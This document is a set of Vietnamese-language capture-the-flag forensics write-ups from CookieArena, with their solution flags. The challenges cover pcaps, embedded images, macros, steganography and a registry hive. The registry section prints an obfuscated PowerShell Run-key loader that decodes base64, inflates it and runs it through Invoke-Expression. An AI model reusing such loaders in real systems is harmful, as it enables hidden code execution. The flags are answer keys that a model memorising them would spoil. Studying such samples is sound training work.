
1 | CookieArena - Very Easy and Easy challenge |
Tomcat
Hackers attacked our Tomcat Web server. Our monitoring system collects network traffic during hacker intrusion. Please help us determine the attack method and what the stolen data is in the /flag.txt file.
Author: @Meme
Mở file và lọc theo data thì mình thấy được các lệnh mà kẻ tấn công đã thucự thi như: ls, cat,… nhưng phần quan trọng là mình biết được flag bị encode base64 do kẽ tấng công đã encode base64 để giấu flag

Mình tập trung tìm các chuỗi base64 và tìm được chuỗi có khả năng là flag

Decode base64 thì có được flag

Flag: CHH{70MCAT_REvERSe_5He1l}
Thumbnail
In Windows, thumbs.db files are database files containing the small images displayed when you view a folder in Thumbnail view (as opposed to Tile, Icon, List, or Detail view). These files are automatically generated by Windows, and there is no harm in deleting them or excluding them from system backups.
Author: @Meme
Mình kiểm tra xem đây là file gì thì được biết đây là file tài liệu

Dùng strings để xem thì mình thấy có một vài header của ảnh .jpg trong file này có khả năng là bị nhúng vào

Nên mình dùng binwalk thì phát hiện có 6 ảnh bị giấu bên trong nhưng mình không dùng binwalk để xuất nó ra được

Vì vậy mình chuyển sang foremost thì được

Kiểm tra từng ảnh thì mình có được flag

Flag: CHH{3XTrac7_ThumB5.dB}
File Extension
Is real photo?
Author: @Bquanman
Kiểm tra file thì phát hiện đây không phải file jpg mà là file PE32+ mình tìm hiểu thì file này là file nhị phân trên windows tương tự exe

Đổi extension thành .exe

Chạy file exe
1 | WINEPREFIX=$HOME/.wine_pe64 /usr/lib/wine/wine64 --version |

Flag: CHH{B3_c4r3ful_w1th_f1l3_exT3ns10n}
AudiCaty
The Spectrogram View of an audio track provides a visual indication of how the energy in different frequency bands changes over time. The Spectrogram can show sudden onset of a sound, so it can often be easier to see clicks and other glitches or to line up beats in this view rather than in one of the waveform views.
When you got a message Flag{XXX}, please submit the flag with format CHH{XXX}
Author: @Meme
Như gợi ý của bài thì mình sẽ dùng phần mềm đọc file âm thanh để xem, có 2 phân mầm cho việc đó là Audacity và Sonic-visualiser mà mình quen dùng Sonic-visualiser sẽ dùng nó

Mở lên và thêm layer Spectogram như mô tả nói thì mình thấy có thông điệp ẩn nhưng chưa hiện rõ hoàn toàn nên mình sẽ chỉnh sửa thông số và lấy flag

Flag: CHH{No_Bullets_for_P1ayer_001}
From The Above
Every day multiple NOAA weather satellites pass above you. Each NOAA weather satellite broadcasts an Automatic Picture Transmission (APT) signal, which contains a live weather image of your area.
We have an APT audio recording. Could you decode it? When you got a message Flag{XXX}, please submit the flag with format CHH{XXX}
Author: @Meme
Bìa này thì lúc đầu mình không đọc mô tả nhảy vô phân tích file wav luôn nhưng không thu được gì

Sau đó mình đọc miêu tả thì nó miêu tả về phương pháp truyền hình ảnh bằng sóng có tên gọi là APT (Automatic Picture Transmission) dùng trong dự báo thời thiết vì thế mình search từ khóa ==wav to APT== thì tìm được trang web biến đổi từ file wav thành hình ảnh

Flag: CHH{h3ll0_fr0m_th3_0th3r_Sky}
Deleted SMS
We receive information about thieves using text messages to exchange sensitive information. Before leaving, they deleted messages to erase traces. Is deleting this data safe? Please help us restore that secret message.
Author: @Meme
Mở file database lên thì mình thấy có 2 bảng là phone_call và sms do miêu tả bài này attacker đã sử dụng tin nhắn để tấng công nên mình tập trung vào bảng sms

Trong đây là 1 cuộc hội thoại và như biêu tả thì có 1 phần bị xóa

Mình tìm được đoạn này nhưng dường như chưa phải là flag

Tin học văn phòng cơ bản
Sau khi tham gia một khóa Tin học văn phòng cơ bản, Hòa đã có thể tự tạo một tệp tài liệu độc hại và anh ta có ý định sẽ dùng nó để hack cả thế giới
Author: @Bquanman
Đầu tiên kiểm tra xem có flash nhúng hay không

Xem các chỗ nguy cơ thì mình thấy có VBA Macros
1 | oleid ~/Downloads/Challenge.doc |

Xem báo cáo triage + IOC
1 | olevba ~/Downloads/Challenge.doc |

Flag: CHH{If_u_w4nt_1_will_aft3rnull_u}
Trivial Flag Transfer Protocol
FTP protocol is plaintext data; you can easily see the data transfer between the client and server. Using Wireshark to analyse the pcap file, extract the data and find the FLAG,
Author: @Collector
Đầu tiên filter theo data thì mình tìm được các dòng chữ được mã hoá ROT13 sau

1 | TFTP DOESNT ENCRYPT OUR TRAFFIC SOWE MUST DISGUISE OUR FLAG TRANSFER |

1 | I USED THE PROGRAM AND HID IT WITH-DUEDILIGENCE.CHECK OUT THE PHOTOS |
Thông tin có được từ 2 đoạn trên là:
- Giao thức TFTP không mã hóa các tracffic
- Flag được giấu đi bằng cách nguỵ trang
- Từ khóa DUEDILIGENCE được sử dụng
- Kiểm tra ảnh
Vậy nên mình sẽ xuất gói tin có giao thức TFTP thì mình thấy có 3 file ảnh

Xuất lần lượt 3 file ảnh ra và kiểm tra và từ các thông tin mình thu được mình đoán Flag được giấu + từ khóa -> kỹ thuật giấu tin bằng steghide

Vậy là có được flag
Flag: picoCTF{h1dd3n_1n_pLa1n_51GHT_18375919}
Sổ đăng ký
Hòa thấy hiện tượng lạ mỗi khi anh ta khởi động máy tính. Anh ta nghĩ rằng việc tải các video không lành mạnh gần đây đã khiến máy tính của anh ta bị hack.
Author: @Bquanman
Dùng registryspy để mở file Hive
Do trong bài có đề cập rằng Hòa thấy hiện tượng lạ mỗi khi anh ta khởi động máy tính nên mình nghĩ malware này khởi động cùng với máy tính nên mình vào mục Software\Microsoft\Windows\CurrentVersion\Run để check đầu tiên

Trong đây mình tìm thấy có đoạn base64
1 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "(neW-obJEct io.COMprEssIon.dEFlATesTReAm( [sySTem.IO.memorYSTREam] [coNVeRT]::FRoMBAse64stRInG( 'TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8='), [SYSTEM.iO.ComPReSSion.CoMPrEsSIonmODe]::DeCOmpresS)|FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()|inVOKe-exprEsSIon" |
Decode base64 + inflate

Flag: CHH{N0_4_go_n0_st4r_wh3r3}